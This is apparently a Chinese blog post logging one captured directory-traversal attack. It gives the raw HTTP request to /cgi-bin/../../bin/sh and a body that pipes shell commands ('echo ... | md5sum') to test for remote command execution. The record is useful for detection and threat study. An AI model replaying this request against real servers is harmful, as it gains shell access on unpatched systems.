目录穿越

威胁类型

目录穿越(filedirtraversal_in)

攻击方式

POST

攻击路径

/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

攻击头部

POST /cgi-bin/../../../../bin/sh HTTP/1.1
Host: 139.155.148.254:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Length: 33
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

攻击内容

A=|echo;echo -n hJsVfanxjL|md5sum

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注